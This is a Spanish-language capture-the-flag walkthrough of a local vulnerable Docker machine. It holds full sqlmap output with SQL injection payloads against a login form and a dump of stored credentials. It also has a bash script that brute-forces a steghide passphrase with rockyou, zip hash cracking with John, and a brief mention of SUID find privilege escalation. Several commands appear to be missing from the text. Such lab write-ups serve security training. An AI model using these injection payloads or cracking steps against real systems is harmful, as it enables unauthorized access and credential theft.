Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzipmirame.zip
Nos lo descomprimira y despues montamos la maquina de la siguiente forma.
bashauto_deploy.shmirame.tar
Info:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
Info:
Si vamos al puerto 80 veremos un panel de login, por lo que intentaremos meter credenciales por defecto, como por ejemplo admin:admin, etc... Pero vemos que no hace gran cosa, fuzzearemos un poco por los directorios.
Gobuster
Info:
Nos saca algunas cosas interesantes, pero ninguna de las descubiertas que haga nada interesante, si volvemos al login y probamos inyeccion mysql, veremos que funciona si ponemos lo siguiente.
Nos lleva a la pagina.php por lo que esta funcionando la inyeccion y sabemos que es vulnerable, ahora pasaremos averiguar la bases de datos que tiene por si tuviera algo interesante dentro.
SQL Injection
Abriremos BurpSuit para capturar la peticion del login y crear un archivo request.txt para utilizar en sqlmap.
request.txt
Una vez teniendo la peticion, iniciaremos la herramienta de sqlmap de la siguiente forma.
Info:
Por lo que vemos a funcionado y nos ha devuelto 2 bases de datos, la que nos interesa es la de users.
Info:
Por lo que vemos contiene una tabla llamada usuarios, por lo que haremos lo siguiente.
Info:
Ahora sabiendo que las columnas se llaman asi, podremos ver el contenido de cada una haciendo lo siguiente.
Info:
Y por lo que vemos nos saca varios usuarios con sus contraseñas, pero entre esa informacion hay un usuario bastante raro llamado directorio y con su contraseña directoriotravieso si probamos a meter esa palabra de contraseña en la URL, veremos que nos lleva a un directorio con una imagen llamada miramebien.jpg
Si nos descargamos esa imagen y vemos que hay dentro de ella.
Steghide
Utilizaremos steghide pero necesitaremos un salvoconducto para que lo extraiga bien, por lo que tiraremos fuerza bruta creando un script en bash.
steghide_brute_force.sh
Info:
Por lo que vemos encontro la contraseña, asi que extraeremos su informacion con ella poniendo lo siguiente.
Info:
Esto nos dara un archivo .zip que llevara tambien contraseña, por lo que haremos lo siguiente.
NOTA
Tambien podemos utilizar la herramienta stegseek para hacer fuerza bruta en la extraccion de contenido oculto de una imagen. ($ stegseek extract -sf miramebien.jpg -wl <WORDLIST>)
zip2john
Info:
Por lo que vemos la contraseña es stupid1, ahora si que lo podremos descomprimir y obtendremos 2 archivos.
unzip
Info:
Si leemos el archivo secret.txt veremos lo siguiente.
Son las credenciales de un usuario, por lo que nos conectaremos mediante ssh.
SSH
Metemos la contraseña carlitos y ya estariamos dentro.
Escalate Privilege
Si vemos que permisos SUID tenemos, veremos lo siguiente.
Info:
Vemos que find esta con permisos de SUID por lo que podremos hacer esto.
___
__H__
___ ___[.]_____ ___ ___ {1.8.7#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:11:49 /2024-08-13/
[13:11:49] [INFO] parsing HTTP request from 'request.txt'
[13:11:49] [INFO] testing connection to the target URL
[13:11:50] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:11:50] [INFO] testing if the target URL content is stable
[13:11:50] [INFO] target URL content is stable
[13:11:50] [INFO] testing if POST parameter '
username' is dynamic
[13:11:50] [WARNING] POST parameter '
username' does not appear to be dynamic
[13:11:50] [WARNING] heuristic (basic) test shows that POST parameter '
username' might not be injectable
[13:11:50] [INFO] testing for SQL injection on POST parameter '
username'
[13:11:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:11:50] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:11:50] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[13:11:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:11:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[13:11:50] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:11:50] [INFO] testing 'Generic inline queries'
[13:11:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:11:50] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:11:50] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:11:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:11:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:11:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[13:11:50] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[13:11:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:11:55] [WARNING] POST parameter '
username' does not seem to be injectable
[13:11:55] [INFO] testing if POST parameter 'password' is dynamic
[13:11:55] [WARNING] POST parameter 'password' does not appear to be dynamic
[13:11:55] [INFO] heuristic (basic) test shows that POST parameter 'password' might be injectable (possible DBMS: 'MySQL')
[13:11:55] [INFO] testing for SQL injection on POST parameter 'password'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[13:12:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:12:01] [WARNING] reflective value(s) found and filtering out
[13:12:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:12:01] [INFO] testing 'Generic inline queries'
[13:12:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[13:12:01] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://172.17.0.2/page.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[13:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[13:12:06] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --code=200)
[13:12:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:12:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:12:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:12:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:12:06] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[13:12:06] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[13:12:06] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[13:12:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[13:12:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[13:12:06] [INFO] POST parameter 'password' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[13:12:06] [INFO] testing 'MySQL inline queries'
[13:12:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:12:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[13:12:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[13:12:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[13:12:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[13:12:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[13:12:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[13:12:16] [INFO] POST parameter 'password' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[13:12:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:12:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[13:12:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:12:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:12:16] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[13:12:22] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[13:12:22] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[13:12:25] [INFO] testing 'MySQL UNION query (80) - 21 to 40 columns'
[13:12:25] [INFO] testing 'MySQL UNION query (80) - 41 to 60 columns'
[13:12:25] [INFO] testing 'MySQL UNION query (80) - 61 to 80 columns'
[13:12:25] [INFO] testing 'MySQL UNION query (80) - 81 to 100 columns'
[13:12:25] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 350 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload:
username=admin&password=admin' OR NOT 7038=7038#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
username=admin&password=admin' AND (SELECT 8275 FROM(SELECT COUNT(*),CONCAT(0x7176766a71,(SELECT (ELT(8275=8275,1))),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pyTZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
username=admin&password=admin' AND (SELECT 9281 FROM (SELECT(SLEEP(5)))vxKl)-- xpCW
---
[13:12:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:12:27] [INFO] fetching database names
[13:12:27] [INFO] retrieved: 'information_schema'
[13:12:27] [INFO] retrieved: 'users'
available databases [2]:
[*] information_schema
[*] users
[13:12:27] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 13:12:27 /2024-08-13/
sqlmap -r request.txt -D users --tables
___
__H__
___ ___[(]_____ ___ ___ {1.8.7#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:14:15 /2024-08-13/
[13:14:15] [INFO] parsing HTTP request from 'request.txt'
[13:14:15] [INFO] resuming back-end DBMS 'mysql'
[13:14:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload:
username=admin&password=admin' OR NOT 7038=7038#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
username=admin&password=admin' AND (SELECT 8275 FROM(SELECT COUNT(*),CONCAT(0x7176766a71,(SELECT (ELT(8275=8275,1))),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pyTZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
username=admin&password=admin' AND (SELECT 9281 FROM (SELECT(SLEEP(5)))vxKl)-- xpCW
---
[13:14:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:14:15] [INFO] fetching tables for database: 'users'
[13:14:15] [INFO] retrieved: 'usuarios'
Database: users
[1 table]
+----------+
| usuarios |
+----------+
[13:14:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 13:14:15 /2024-08-13/
___
__H__
___ ___[']_____ ___ ___ {1.8.7#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:15:23 /2024-08-13/
[13:15:23] [INFO] parsing HTTP request from 'request.txt'
[13:15:23] [INFO] resuming back-end DBMS 'mysql'
[13:15:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload:
username=admin&password=admin' OR NOT 7038=7038#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
username=admin&password=admin' AND (SELECT 8275 FROM(SELECT COUNT(*),CONCAT(0x7176766a71,(SELECT (ELT(8275=8275,1))),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pyTZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
username=admin&password=admin' AND (SELECT 9281 FROM (SELECT(SLEEP(5)))vxKl)-- xpCW
---
[13:15:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:15:23] [INFO] fetching columns for table 'usuarios' in database 'users'
[13:15:23] [INFO] retrieved: 'id'
[13:15:24] [INFO] retrieved: 'int(11)'
[13:15:24] [INFO] retrieved: 'username'
[13:15:24] [INFO] retrieved: 'varchar(50)'
[13:15:24] [INFO] retrieved: 'password'
[13:15:24] [INFO] retrieved: 'varchar(255)'
Database: users
Table: usuarios
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| password | varchar(255) |
| username | varchar(50) |
+----------+--------------+
[13:15:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 13:15:24 /2024-08-13/
___
__H__
___ ___["]_____ ___ ___ {1.8.7#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:16:02 /2024-08-13/
[13:16:02] [INFO] parsing HTTP request from 'request.txt'
[13:16:02] [INFO] resuming back-end DBMS 'mysql'
[13:16:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload:
username=admin&password=admin' OR NOT 7038=7038#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
username=admin&password=admin' AND (SELECT 8275 FROM(SELECT COUNT(*),CONCAT(0x7176766a71,(SELECT (ELT(8275=8275,1))),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pyTZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
username=admin&password=admin' AND (SELECT 9281 FROM (SELECT(SLEEP(5)))vxKl)-- xpCW
---
[13:16:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:16:02] [INFO] fetching entries of column(s) 'id,password,username' for table 'usuarios' in database 'users'
[13:16:02] [INFO] retrieved: '1'
[13:16:02] [INFO] retrieved: 'chocolateadministrador'
[13:16:02] [INFO] retrieved: 'admin'
[13:16:02] [INFO] retrieved: '2'
[13:16:02] [INFO] retrieved: 'lucas'
[13:16:02] [INFO] retrieved: 'lucas'
[13:16:02] [INFO] retrieved: '3'
[13:16:02] [INFO] retrieved: 'soyagustin123'
[13:16:02] [INFO] retrieved: 'agustin'
[13:16:02] [INFO] retrieved: '4'
[13:16:02] [INFO] retrieved: 'directoriotravieso'
[13:16:02] [INFO] retrieved: 'directorio'
Database: users
Table: usuarios
[4 entries]
+----+------------+------------------------+
| id | username | password |
+----+------------+------------------------+
| 1 | admin | chocolateadministrador |
| 2 | lucas | lucas |
| 3 | agustin | soyagustin123 |
| 4 | directorio | directoriotravieso |
+----+------------+------------------------+
[13:16:02] [INFO] table 'users.usuarios' dumped to CSV file '/root/.local/share/sqlmap/output/172.17.0.2/dump/users/usuarios.csv'
[13:16:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.17.0.2'
[*] ending @ 13:16:02 /2024-08-13/
URL = http://<IP>/directoriotravieso/
#!/bin/bash
# Archivo esteganografiado
stegofile="miramebien.jpg"
# Archivo a extraer
outputfile="output.txt"
# Diccionario de contraseñas
wordlist="/usr/share/wordlists/rockyou.txt"
# Fuerza bruta usando el diccionario
while read -r password; do
echo "Probando: $password"
steghide extract -sf $stegofile -p "$password" -xf $outputfile -f &> /dev/null
if [ $? -eq 0 ]; then
echo "¡Contraseña encontrada!: $password"
exit 0
fi
done < "$wordlist"
echo "Contraseña no encontrada en el diccionario."
Enter passphrase:
wrote extracted data to "ocultito.zip".
zip2john ocultito.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stupid1 (ocultito.zip/secret.txt)
1g 0:00:00:00 DONE (2024-08-13 13:46) 50.00g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..eatme1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
